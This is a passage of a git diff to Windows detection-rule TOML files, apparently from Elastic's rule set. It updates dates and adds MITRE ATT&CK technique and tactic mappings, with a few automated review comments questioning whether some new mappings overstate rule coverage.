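that breadth is only justified if the child-process list actually names the corresponding discovery utilities, which is worth confirming so the rule's ATT&CK coverage is not overstated.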
@@ -110,27 +110,30 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" reference = "https://attack.mitre.org/techniques/T1566/001/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" 
@@ -141,22 +144,60 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" +[[rule.threat.technique.subtechnique]] +id = "T1218.003" +name = "CMSTP" +reference = "https://attack.mitre.org/techniques/T1218/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.004" +name = "InstallUtil" +reference = "https://attack.mitre.org/techniques/T1218/004/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.008" +name = "Odbcconf" +reference = "https://attack.mitre.org/techniques/T1218/008/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.009" +name = "Regsvcs/Regasm" +reference = "https://attack.mitre.org/techniques/T1218/009/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.010" +name = "Regsvr32" +reference = "https://attack.mitre.org/techniques/T1218/010/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/initial_access_suspicious_windows_server_update_svc.toml b/rules/windows/initial_access_suspicious_windows_server_update_svc.toml index c1bfe3cbe84..051751fafd3 100644 --- a/rules/windows/initial_access_suspicious_windows_server_update_svc.toml 
+++ b/rules/windows/initial_access_suspicious_windows_server_update_svc.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/24" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/10/24" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -86,22 +86,25 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" 
@@ -112,10 +115,43 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" + +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/initial_access_url_cve_2025_33053.toml b/rules/windows/initial_access_url_cve_2025_33053.toml index 17c356f8d2c..6f022a55f11 100644 --- a/rules/windows/initial_access_url_cve_2025_33053.toml +++ b/rules/windows/initial_access_url_cve_2025_33053.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/11" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/06/11" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -84,10 +84,12 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" 
@@ -103,18 +105,38 @@ id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1036" +name = "Masquerading" +reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique.subtechnique]] +id = "T1036.005" +name = "Match Legitimate Resource Name or Location" +reference = "https://attack.mitre.org/techniques/T1036/005/" -[[rule.threat]] -framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml b/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml index 7a7e8c67522..123281bc710 100644 --- a/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml +++ b/rules/windows/initial_access_via_explorer_suspicious_child_parent_args.toml @@ -2,7 +2,7 @@ creation_date = "2020/10/29" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -96,10 +96,12 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" @@ -110,18 +112,19 @@ id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" 
@@ -137,22 +140,45 @@ id = "T1059.005" name = "Visual Basic" reference = "https://attack.mitre.org/techniques/T1059/005/" +[[rule.threat.technique]] +id = "T1559" +name = "Inter-Process Communication" +reference = "https://attack.mitre.org/techniques/T1559/" +[[rule.threat.technique.subtechnique]] +id = "T1559.001" +name = "Component Object Model" +reference = "https://attack.mitre.org/techniques/T1559/001/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.010" +name = "Regsvr32" +reference = "https://attack.mitre.org/techniques/T1218/010/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/windows/initial_access_webshell_screenconnect_server.toml b/rules/windows/initial_access_webshell_screenconnect_server.toml index fbe76f594f5..261f5786467 100644 --- a/rules/windows/initial_access_webshell_screenconnect_server.toml +++ b/rules/windows/initial_access_webshell_screenconnect_server.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/26" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/12" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -92,22 +92,25 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -118,10 +121,25 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" + +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/initial_access_xsl_script_execution_via_com.toml b/rules/windows/initial_access_xsl_script_execution_via_com.toml index 2a1b8903abd..0e82b88b145 100644 --- a/rules/windows/initial_access_xsl_script_execution_via_com.toml +++ b/rules/windows/initial_access_xsl_script_execution_via_com.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/27" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -82,31 +82,64 @@ The Microsoft.XMLDOM COM interface allows applications to parse and transform XM [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1220" name = "XSL Script Processing" reference = "https://attack.mitre.org/techniques/T1220/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.005" +name = "Visual Basic" +reference = "https://attack.mitre.org/techniques/T1059/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" + +[[rule.threat.technique]] +id = "T1559" +name = "Inter-Process Communication" +reference = "https://attack.mitre.org/techniques/T1559/" + +[[rule.threat.technique.subtechnique]] +id = "T1559.001" +name = "Component Object Model" +reference = "https://attack.mitre.org/techniques/T1559/001/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/lateral_movement_cmd_service.toml b/rules/windows/lateral_movement_cmd_service.toml index 3e17c1558a3..7f787510c06 100644 --- a/rules/windows/lateral_movement_cmd_service.toml +++ b/rules/windows/lateral_movement_cmd_service.toml 
@@ -2,7 +2,7 @@ creation_date = "2020/09/02" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -80,48 +80,54 @@ sequence by process.entity_id with maxspan = 1m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.002" +name = "SMB/Windows Admin Shares" +reference = "https://attack.mitre.org/techniques/T1021/002/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1543" name = "Create or Modify System Process" reference = "https://attack.mitre.org/techniques/T1543/" + [[rule.threat.technique.subtechnique]] id = "T1543.003" name = "Windows Service" reference = "https://attack.mitre.org/techniques/T1543/003/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1569" name = "System Services" reference = "https://attack.mitre.org/techniques/T1569/" + [[rule.threat.technique.subtechnique]] id = "T1569.002" name = "Service Execution" reference = "https://attack.mitre.org/techniques/T1569/002/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/lateral_movement_credential_access_kerberos_correlation.toml b/rules/windows/lateral_movement_credential_access_kerberos_correlation.toml index ecce43b56cd..4453dc6b459 100644 --- a/rules/windows/lateral_movement_credential_access_kerberos_correlation.toml +++ b/rules/windows/lateral_movement_credential_access_kerberos_correlation.toml 
@@ -2,7 +2,7 @@ creation_date = "2025/10/28" integration = ["endpoint", "windows", "system"] maturity = "production" -updated_date = "2025/12/12" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -99,33 +99,39 @@ sequence by source.port, source.ip with maxspan=3s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.003" name = "Pass the Ticket" reference = "https://attack.mitre.org/techniques/T1550/003/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1558" name = "Steal or Forge Kerberos Tickets" reference = "https://attack.mitre.org/techniques/T1558/" + [[rule.threat.technique.subtechnique]] id = "T1558.003" name = "Kerberoasting" reference = "https://attack.mitre.org/techniques/T1558/003/" - +[[rule.threat.technique.subtechnique]] +id = "T1558.004" +name = "AS-REP Roasting" +reference = "https://attack.mitre.org/techniques/T1558/004/" [rule.threat.tactic] id = "TA0006" diff --git a/rules/windows/lateral_movement_dcom_hta.toml b/rules/windows/lateral_movement_dcom_hta.toml index 4f7be9dafd2..e232e9ab815 100644 --- a/rules/windows/lateral_movement_dcom_hta.toml +++ b/rules/windows/lateral_movement_dcom_hta.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/03" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
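Review bot: T1558.004 (AS-REP Roasting) is added beside T1558.003 under Credential Access, but whether the correlation introduced by `sequence by source.port, source.ip with maxspan=3s` actually observes authentication requests made without pre-authentication is not visible in this hunk; if the query only correlates service-ticket requests, the new sub-technique overstates what the rule detects. Confirm against the query above the hunk, or keep the mapping at T1558 plus T1558.003 until the query covers that case. The `[rule.threat.tactic]` block for TA0006 continues past the end of the hunk.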
@@ -85,36 +85,54 @@ sequence with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.003" name = "Distributed Component Object Model" reference = "https://attack.mitre.org/techniques/T1021/003/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.005" name = "Mshta" reference = "https://attack.mitre.org/techniques/T1218/005/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1559" +name = "Inter-Process Communication" +reference = "https://attack.mitre.org/techniques/T1559/" + +[[rule.threat.technique.subtechnique]] +id = "T1559.001" +name = "Component Object Model" +reference = "https://attack.mitre.org/techniques/T1559/001/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/lateral_movement_dcom_mmc20.toml b/rules/windows/lateral_movement_dcom_mmc20.toml index edec6ac25c0..931dc6bc10e 100644 --- a/rules/windows/lateral_movement_dcom_mmc20.toml +++ b/rules/windows/lateral_movement_dcom_mmc20.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/06" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -84,36 +84,54 @@ sequence by host.id with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.003" name = "Distributed Component Object Model" reference = "https://attack.mitre.org/techniques/T1021/003/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.014" name = "MMC" reference = "https://attack.mitre.org/techniques/T1218/014/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1559" +name = "Inter-Process Communication" +reference = "https://attack.mitre.org/techniques/T1559/" + +[[rule.threat.technique.subtechnique]] +id = "T1559.001" +name = "Component Object Model" +reference = "https://attack.mitre.org/techniques/T1559/001/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/lateral_movement_dcom_shellwindow_shellbrowserwindow.toml b/rules/windows/lateral_movement_dcom_shellwindow_shellbrowserwindow.toml index 99d6bbb8067..023860a5a08 100644 --- a/rules/windows/lateral_movement_dcom_shellwindow_shellbrowserwindow.toml +++ b/rules/windows/lateral_movement_dcom_shellwindow_shellbrowserwindow.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/06" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -85,19 +85,36 @@ sequence by host.id with maxspan=5s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.003" name = "Distributed Component Object Model" reference = "https://attack.mitre.org/techniques/T1021/003/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1559" +name = "Inter-Process Communication" +reference = "https://attack.mitre.org/techniques/T1559/" + +[[rule.threat.technique.subtechnique]] +id = "T1559.001" +name = "Component Object Model" +reference = "https://attack.mitre.org/techniques/T1559/001/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/lateral_movement_evasion_rdp_shadowing.toml b/rules/windows/lateral_movement_evasion_rdp_shadowing.toml index b0a6ce543ed..b3aa744287d 100644 --- a/rules/windows/lateral_movement_evasion_rdp_shadowing.toml +++ b/rules/windows/lateral_movement_evasion_rdp_shadowing.toml @@ -2,7 +2,7 @@ creation_date = "2021/04/12" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -104,19 +104,31 @@ any where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.001" name = "Remote Desktop Protocol" reference = "https://attack.mitre.org/techniques/T1021/001/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1113" +name = "Screen Capture" +reference = "https://attack.mitre.org/techniques/T1113/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" diff --git a/rules/windows/lateral_movement_execution_from_tsclient_mup.toml b/rules/windows/lateral_movement_execution_from_tsclient_mup.toml index a6329dc5a9d..002889aff11 100644 --- a/rules/windows/lateral_movement_execution_from_tsclient_mup.toml +++ b/rules/windows/lateral_movement_execution_from_tsclient_mup.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/11" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -91,19 +91,23 @@ process where host.os.type == "windows" and event.type == "start" and process.ex [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.001" name = "Remote Desktop Protocol" reference = "https://attack.mitre.org/techniques/T1021/001/" - +[[rule.threat.technique]] +id = "T1570" +name = "Lateral Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1570/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/lateral_movement_execution_via_file_shares_sequence.toml b/rules/windows/lateral_movement_execution_via_file_shares_sequence.toml index 9f04832e1d8..3b8a8380436 100644 --- a/rules/windows/lateral_movement_execution_via_file_shares_sequence.toml +++ b/rules/windows/lateral_movement_execution_via_file_shares_sequence.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/03" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/19" +updated_date = "2026/03/24" [transform] [[transform.osquery]] @@ -145,19 +145,23 @@ sequence with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.002" name = "SMB/Windows Admin Shares" reference = "https://attack.mitre.org/techniques/T1021/002/" - +[[rule.threat.technique]] +id = "T1570" +name = "Lateral Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1570/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" - diff --git a/rules/windows/lateral_movement_incoming_wmi.toml b/rules/windows/lateral_movement_incoming_wmi.toml index 8dbb6d82a42..a2831b84880 100644 
--- a/rules/windows/lateral_movement_incoming_wmi.toml +++ b/rules/windows/lateral_movement_incoming_wmi.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/15" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/05/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -99,26 +99,31 @@ sequence by host.id with maxspan = 20s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.003" +name = "Distributed Component Object Model" +reference = "https://attack.mitre.org/techniques/T1021/003/" [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" reference = "https://attack.mitre.org/techniques/T1047/" - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/lateral_movement_rdp_sharprdp_target.toml b/rules/windows/lateral_movement_rdp_sharprdp_target.toml index 2ba965eb464..a32563cd490 100644 --- a/rules/windows/lateral_movement_rdp_sharprdp_target.toml +++ b/rules/windows/lateral_movement_rdp_sharprdp_target.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/11" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
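Review bot: T1021.003 (Distributed Component Object Model) is added under the Lateral Movement entry of a rule whose name and existing T1047 mapping describe incoming WMI, and nothing in the hunk records why DCOM is now claimed as well. Remote WMI does travel over DCOM/RPC, so the mapping is defensible, but the next maintainer will likely read it as a copy-paste from the lateral_movement_dcom_* rules updated in this same patch; a one-line rationale in the rule's `note` field (outside the hunk) would settle that, e.g. `Remote WMI connections arrive over DCOM, hence the T1021.003 mapping alongside T1047.`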
@@ -90,19 +90,41 @@ Remote Desktop Protocol (RDP) enables users to connect to and control remote sys [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1021" name = "Remote Services" reference = "https://attack.mitre.org/techniques/T1021/" + [[rule.threat.technique.subtechnique]] id = "T1021.001" name = "Remote Desktop Protocol" reference = "https://attack.mitre.org/techniques/T1021/001/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/lateral_movement_remote_file_copy_hidden_share.toml b/rules/windows/lateral_movement_remote_file_copy_hidden_share.toml index 197d4339c52..75ea925dba0 100644 --- a/rules/windows/lateral_movement_remote_file_copy_hidden_share.toml +++ b/rules/windows/lateral_movement_remote_file_copy_hidden_share.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/04" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/12/11" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -90,19 +90,41 @@ process where host.os.type == "windows" and event.type == "start" and user.id !=
 [[rule.threat]]
 framework = "MITRE ATT&CK"
+
 [[rule.threat.technique]]
 id = "T1021"
 name = "Remote Services"
 reference = "https://attack.mitre.org/techniques/T1021/"
+
 [[rule.threat.technique.subtechnique]]
 id = "T1021.002"
 name = "SMB/Windows Admin Shares"
 reference = "https://attack.mitre.org/techniques/T1021/002/"
-
+[[rule.threat.technique]]
+id = "T1570"
+name = "Lateral Tool Transfer"
+reference = "https://attack.mitre.org/techniques/T1570/"
 [rule.threat.tactic]
 id = "TA0008"
 name = "Lateral Movement"
 reference = "https://attack.mitre.org/tactics/TA0008/"
+[[rule.threat]]
+framework = "MITRE ATT&CK"
+
+[[rule.threat.technique]]
+id = "T1074"
+name = "Data Staged"
+reference = "https://attack.mitre.org/techniques/T1074/"
+
+[[rule.threat.technique.subtechnique]]
+id = "T1074.002"
+name = "Remote Data Staging"
+reference = "https://attack.mitre.org/techniques/T1074/002/"
+
+[rule.threat.tactic]
+id = "TA0009"
+name = "Collection"
+reference = "https://attack.mitre.org/tactics/TA0009/"
diff --git a/rules/windows/lateral_movement_remote_service_installed_winlog.toml b/rules/windows/lateral_movement_remote_service_installed_winlog.toml
index 374035f3dfd..aaa83582136 100644
--- a/rules/windows/lateral_movement_remote_service_installed_winlog.toml
+++ b/rules/windows/lateral_movement_remote_service_installed_winlog.toml
